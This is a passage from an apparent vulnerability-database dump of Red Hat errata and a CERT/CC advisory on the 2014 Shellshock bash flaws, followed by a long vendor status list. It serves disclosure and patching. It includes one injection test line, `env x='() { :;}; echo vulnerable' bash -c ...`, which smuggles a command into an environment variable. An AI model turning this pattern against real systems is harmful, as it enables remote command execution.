allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. Note that certain services, screen sessions, and tmux sessions may\nneed to be restarted, and affected interactive users may need to re-login.\nInstalling these updated packages without restarting services will address\nthe vulnerability, but functionality may be impacted until affected\nservices are restarted. For more information see the Knowledgebase article\nat https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2018-06-06T20:24:35", "published": "2014-09-26T04:00:00", "id": "RHSA-2014:1306", "href": "https://access.redhat.com/errata/RHSA-2014:1306", "type": "redhat", "title": "(RHSA-2014:1306) Important: bash security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:55", "bulletinFamily": "unix", "description": "The GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables\nneed to be made aware of changes to the way names are handled by this\nupdate. Note that certain services, screen sessions, and tmux sessions may\nneed to be restarted, and affected interactive users may need to re-login.\nInstalling these updated packages without restarting services will address\nthe vulnerability, but functionality may be impacted until affected\nservices are restarted. For more information see the Knowledgebase article\nat https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T12:18:56", "published": "2014-09-26T04:00:00", "id": "RHSA-2014:1311", "href": "https://access.redhat.com/errata/RHSA-2014:1311", "type": "redhat", "title": "(RHSA-2014:1311) Important: bash security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:32", "bulletinFamily": "unix", "description": "The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor\nis a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes\neverything necessary to run and manage virtual machines: a subset of the\nRed Hat Enterprise Linux operating environment and the Red Hat Enterprise\nVirtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain services\nand applications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue. (CVE-2014-6271)\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nA flaw was found in the way NSS parsed ASN.1 (Abstract Syntax Notation One)\ninput from certain RSA signatures. A remote attacker could use this flaw to\nforge RSA certificates by providing a specially crafted signature to an\napplication using NSS. (CVE-2014-1568)\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and possibly\nleading to arbitrary code execution when evaluating untrusted input that\nwould not otherwise be run as code. (CVE-2014-7186)\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash. (CVE-2014-7187)\n\nRed Hat would like to thank Stephane Chazelas for reporting CVE-2014-6271,\nand the Mozilla project for reporting CVE-2014-1568. Upstream acknowledges\nAntoine Delignat-Lavaud and Intel Product Security Incident Response Team\nas the original reporters of CVE-2014-1568. The CVE-2014-7186 and\nCVE-2014-7187 issues were discovered by Florian Weimer of Red Hat Product\nSecurity.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package.\n", "modified": "2018-06-07T09:00:23", "published": "2014-10-02T04:00:00", "id": "RHSA-2014:1354", "href": "https://access.redhat.com/errata/RHSA-2014:1354", "type": "redhat", "title": "(RHSA-2014:1354) Critical: rhev-hypervisor6 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:49:15", "bulletinFamily": "info", "description": "### Overview \n\nGNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution.\n\n### Description \n\nUPDATE: New CVE-IDs added for incomplete patches. Additional resources added and vendor patch information updated.[](<http://cwe.mitre.org/data/definitions/78.html>)\n\n[**CWE-78**](<http://cwe.mitre.org/data/definitions/78.html>)**: OS Command Injection** \n \nBash supports exporting of shell functions to other instances of bash using an environment variable. This environment variable is named by the function name and starts with a \"() {\" as the variable value in the function definition. When Bash reaches the end of the function definition, rather than ending execution it continues to process shell commands written after the end of the function. This vulnerability is especially critical because Bash is widespread on many types of devices (UNIX-like operating systems including Linux and Mac OS X), and because many network services utilize Bash, causing the vulnerability to be network exploitable. Any service or program that sets environment variables controlled by an attacker and calls Bash may be vulnerable. \n \nRed Hat has developed the following test: \n \n`$ env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"` \n \nThe website [shellshocker.net](<https://shellshocker.net/>) from the health IT team at Medical Informatics Engineering has developed several tests for websites and hosts and includes update information. \n \nThis vulnerability is being actively exploited. \n \n--- \n \n### Impact \n\nA malicious attacker may be able to execute arbitrary code at the privilege level of the calling application. \n \n--- \n \n### Solution \n\n**Apply an Update** \nThe first several set of patches (for CVE-2014-6271) do not completely resolve the vulnerability. CVE-2014-7169, CVE-2014-6277, CVE-2014-7186, and CVE 2014-7187 identify the remaining aspects of this vulnerability. Red Hat has provided a [support article ](<https://access.redhat.com/articles/1200223>)with updated information and workarounds. \n \nCERT/CC has also included vendor patch information below when notified of an update. \n \n--- \n \n### Vendor Information\n\nMany UNIX-like operating systems, including Linux distributions and Apple Mac OS X include Bash and are likely to be vulnerable. Contact your vendor for information about updates or patches. This Red Hat[ support article](<https://access.redhat.com/node/1200223>) and [blog post](<https://access.redhat.com/node/1200223>) describe ways that Bash can be called from other programs, including network vectors such as CGI, SSH, and DHCP. [Shell Shock Exploitation Vectors](<https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html>) describes other ways this vulnerability could be exploited. \n \n--- \n \n252743\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apple Inc.\n\nNotified: September 25, 2014 Updated: October 01, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.apple.com/kb/ht6495>\n\n### __ __ Avaya, Inc.\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nSee the following URL for more information from the vendor.\n\n### Vendor References\n\n * <https://downloads.avaya.com/css/P8/documents/100183009>\n\n### Addendum\n\nThe Avaya Communications Server (CS) 1000 Rls 6 has been reported to be vulnerable.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### __ Barracuda Networks\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.barracuda.com/support/techalerts>\n\n### __ Blue Coat Systems\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://kb.bluecoat.com/index?page=content&id=SA82](<https://kb.bluecoat.com/index?page=content&id=SA82>)\n\n### __ CentOS\n\nUpdated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.centos.org/pipermail/centos/2014-September/146099.html>\n\n### __ Check Point Software Technologies\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673 ](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673\n>)\n * <http://www.checkpoint.com/blog/protecting-shellshock/index.html>\n\n### __ Cisco Systems, Inc.\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n**Statement Date: September 26, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash>\n\n### __ Cygwin\n\nUpdated: September 26, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\n<https://cygwin.com/ml/cygwin-announce/2014-09/msg00033.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### __ __ D-Link Systems, Inc.\n\nNotified: September 25, 2014 Updated: October 07, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nAll D-Link Devices and Software have been cleared and are not affected by this \nvulnerability. All D-Link Services have been audited for the use of bash shell \nimplementations. Based on the results of the audit we have applied appropriate \nupdates, if needed, to close this potential vulnerability. D-Link continues \nto monitor CERT incase of further issues are reported about the Bash Shell. \n(Edited: 10/06/2014 15:52 PST) \n\n### Vendor Information\n\nPlease contact at: security@dlink.com\n\n### Vendor References\n\n * <http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10044>\n\n### __ Debian GNU/Linux\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n**Statement Date: September 25, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://security-tracker.debian.org/tracker/source-package/bash>\n * <https://www.debian.org/security/2014/dsa-3035>\n * <https://www.debian.org/security/2014/dsa-3032>\n\n### __ Dell Computer Corporation, Inc.\n\nUpdated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.software.dell.com/k1000/kb/133191>\n\n### Addendum\n\nDell KACE systems use Bash.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### __ Extreme Networks\n\nNotified: September 25, 2014 Updated: October 01, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://learn.extremenetworks.com/rs/extreme/images/VN-2014-001-%20GNU%20Bash%20Threats%20-CVE-2014-7169%20rev01.pdf>\n\n### __ F5 Networks, Inc.\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html>\n\n### __ Fedora Project\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://fedoramagazine.org/shellshock-update-bash-packages-that-resolve-cve-2014-6271-and-cve-2014-7169-available/>\n\n### __ FireEye\n\nUpdated: October 02, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.fireeye.com/resources/pdfs/support-notices/FireEye-Statement-About-Bash-Shellshock-Vulnerability-CVE-2014-6271-and-CVE-2014-7169.pdf>\n\n### __ Fortinet, Inc.\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.fortiguard.com/advisory/FG-IR-14-030/>\n\n### __ GNU Bash\n\nUpdated: September 25, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://ftp.gnu.org/gnu/bash/bash-4.3-patches/>\n\n### __ Gentoo Linux\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.gentoo.org/security/en/glsa/glsa-201409-09.xml>\n\n### __ __ Hewlett-Packard Company\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nSee the following URL for more information from the vendor.\n\n### Vendor References\n\n * <http://alerts.hp.com/r?2.1.3KT.2ZR.15ee22.L8mgqE..N.ghvS.8f9A.bW89MQ%5f%5fDBOSFQK0>\n\n### __ IBM Corporation\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www-01.ibm.com/support/docview.wss?uid=isg3T1021272>\n * [http://www-01.ibm.com/support/docview.wss?uid=swg21685433&myns=swgws&mynp=OCSSEQTP&mynp=OCSSEQTJ&mync=E](<http://www-01.ibm.com/support/docview.wss?uid=swg21685433&myns=swgws&mynp=OCSSEQTP&mynp=OCSSEQTJ&mync=E>)\n\n### Addendum\n\nAIX Toolbox for Linux Applications provides Bash and is vulnerable. IBM HTTP Server (IHS) is based on Apache and may act as an attack vector, depending on configuration.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### __ Juniper Networks, Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n**Statement Date: September 25, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://kb.juniper.net/JSA10648>\n\n### __ Mageia\n\nUpdated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://advisories.mageia.org/MGASA-2014-0388.html>\n\n### __ McAfee\n\nNotified: September 25, 2014 Updated: October 07, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10085](<https://kc.mcafee.com/corporate/index?page=content&id=SB10085>)\n\n### __ Monroe Electronics\n\nUpdated: October 02, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.digitalalertsystems.com/registration_updates.html>\n * <http://www.digitalalertsystems.com/download/dasdec-aux_app_upgrade-2.5-1.i386.drpm>\n * <http://www.digitalalertsystems.com/download/dasdec_fc10-aux_app_upgrade-2.5-1.i386.drpm>\n * <http://www.digitalalertsystems.com/pdf/DASDEC%20BASH%20Update%20Release%20Notes%20R1.0.pdf>\n * <http://www.digitalalertsystems.com/pdf/DASDEC%20Software%20Update%20Instructions%2061512.pdf>\n * <http://www.monroe-electronics.com/EAS_pages/r189se_registration.html>\n * <http://www.monroe-electronics.com/EAS_pages/downloads/dasdec-aux_app_upgrade-2.5-1.i386.drpm>\n * <http://www.monroe-electronics.com/EAS_pages/downloads/dasdec_fc10-aux_app_upgrade-2.5-1.i386.drpm>\n * <http://www.monroe-electronics.com/EAS_pages/pdf/One-Net%20BASH%20Update%20Release%20Notes%20R1.0.pdf>\n * <http://www.monroe-electronics.com/EAS_pages/pdf/One-Net%20Software%20Update%20Instructions%2061512.pdf>\n\n### Addendum\n\nDASDEC-1EN running software version 2.0-2 reported to be vulnerable: <http://seclists.org/fulldisclosure/2014/Sep/107>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### __ NEC Corporation\n\nNotified: September 25, 2014 Updated: October 07, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://jpn.nec.com/security-info/av14-003.html>\n\n### __ __ NIKSUN\n\nNotified: November 10, 2014 Updated: November 11, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\n`Information contained below is subject to change due to the evolving nature of \nCVE-reported information & available fixes. \n \n\"ShellShock\" CVE-2014-6271 & CVE-2014-7169 are now resolved in software patches \nmade available via NIKSUN SupportNet. NIKSUN has now produced software updates \nfor all supported product lines. We continue to observe activity on the NSON \n(NIKSUN Security Observation Network) to produce current threat detections \u00e2\u20ac\u201c \nmore signatures may be released as we continuously observe behavior globally. \nCurrent signatures should be downloaded & installed, available via SupportNet, \nto get the most out of your NIKSUN security products. \n \nThe BASH component defect affecting the community-at-large is serious, but \nunlike the Heartbleed defect, which generically affected many publically \navailable products in exactly the same way, Shellshock requires a specific set \nof conditions to exist for exploitation. \n \nNIKSUN is both a contributor to the open source community as well as a consumer \nand is leveraging those relationships to bring this issue to a satisfactory \nclose. \n \n\"ShellShock\" CVE-2014-6271 & CVE-2014-7169 are now resolved in software patches \nmade available via NIKSUN SupportNet. NIKSUN has now produced software updates \nfor all supported product lines, with additional work in progress on breaking \nCVEs related to ShellShock exposed in the last few days \u00e2\u20ac\u201c software currently \nin a quality assurance cycle will become available this week for remaining CVEs \nassociated with ShellShock now that the global community has agreed on a \nsustainable, supportable fix. We continue to observe activity on the NSON \n(NIKSUN Security Observation Network) to produce current threat detections with \nmore signatures released as we continuously observe behavior globally. Current \nsignatures should be downloaded & installed, available via SupportNet, to get \nthe most out of your NIKSUN security products. \n \nNIKSUN is committed to providing a rapid resolution to this issue while \nensuring quality, stability & completeness of a fix. \n \nThe list below is not a fully comprehensive version list \n \nNIKOS Appliance 4.3.2.0 \nNIKOS Appliance 4.3.1.2 \nNIKOS Appliance 4.4.1.1 \nNIKOS Appliance 4.4.1.2 \nNIKOS Appliance 4.5.0.0_9 \nNIKOS Appliance 4.5.0.1 \n \nNetOmni 4.3.1.2 \nNetOmni 4.3.2.0 \nNetOmni 4.4.1.1 \nNetOmni 4.4.1.2 \nNetOmni 4.5.0.0 \nNetOmni 4.5.0.1 \nNetOmni 4.5.1.0`\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ NetApp\n\nUpdated: September 29, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nSee the following URL for more information from the vendor\n\n### Vendor References\n\n * <https://library.netapp.com/ecm/ecm_get_file/ECMP1655016>\n\n### __ Novell, Inc.\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2014-6271.html>\n\n### __ Oracle Corporation\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://oss.oracle.com/pipermail/el-errata/2014-September/004485.html>\n * <http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html>\n\n### Addendum\n\nSolaris includes Bash and Oracle Linux is based on Red Hat Linux.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### __ Palo Alto Networks\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://securityadvisories.paloaltonetworks.com/>\n\n### Addendum\n\nSee PAN-SA-2012-000{2,3,4,5}. Please use CVE.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### __ QNAP Security\n\nUpdated: April 14, 2015 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://www.qnap.com/i/en/news/con_show.php?op=showone&cid=360](<https://www.qnap.com/i/en/news/con_show.php?op=showone&cid=360>)\n\n### __ Red Hat, Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/articles/1200223>\n * <https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/>\n\n### __ SUSE Linux\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2014-6271.html>\n * <https://www.suse.com/support/shellshock/>\n * <https://www.suse.com/support/kb/doc.php?id=7015702>\n\n### __ Slackware Linux Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n**Statement Date: September 25, 2014**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.522193](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.522193>)\n\n### __ __ Sophos, Inc.\n\nUpdated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nAs far as we are aware, none of Sophos's Linux or UNIX products use Bash in a way that would allow this vulnerability to be exploited with data supplied by an attacker from outside.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.sophos.com/en-us/support/knowledgebase/121444.aspx>\n * <http://nakedsecurity.sophos.com/2014/09/25/bash-shellshock-vulnerability-what-you-need-to-know/>\n\n### __ Trend Micro\n\nUpdated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://esupport.trendmicro.com/solution/en-US/1105233.aspx>\n\n### __ Ubuntu\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-2362-1/>\n\n### __ VMware\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2090740](<http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2090740>)\n\n### __ Xirrus\n\nUpdated: October 01, 2014 \n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://cdn.xirrus.com/pdf/Statement-on-ShellShock.pdf>\n\n### __ __ FreeBSD Project\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n**Statement Date: September 25, 2014**\n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nCurrently we have already patched CVE-2014-6271 and CVE-2014-7169 in the FreeBSD ports tree, making it no longer vulnerable to these two issues. We will patch the new issues once the fix is validated.\n\nThe FreeBSD base system do not use bash at all and is therefore not affected.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://svnweb.freebsd.org/ports?view=revision&revision=369341](<https://svnweb.freebsd.org/ports?view=revision&revision=369341>)\n\n### Addendum\n\nFreeBSD has disabled function importing by default in the Bash port.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### __ __ Global Technology Associates, Inc.\n\nNotified: September 25, 2014 Updated: October 01, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nGTA firewalls running any version of GB-OS are not vulnerable to the \"shellshock\" exploit.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Microsoft Corporation\n\nNotified: September 25, 2014 Updated: October 10, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ NetBSD\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n### Status\n\n__ Not Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://pkgsrc.se/files.php?messageId=20140925202832.9AD9C98@cvs.netbsd.org>\n\n### __ ACCESS\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ AT&T\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Alcatel-Lucent\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor References\n\n### __ Belkin, Inc.\n\nNotified: September 25, 2014 Updated: September 25, 2014 \n\n### Status\n\n__ 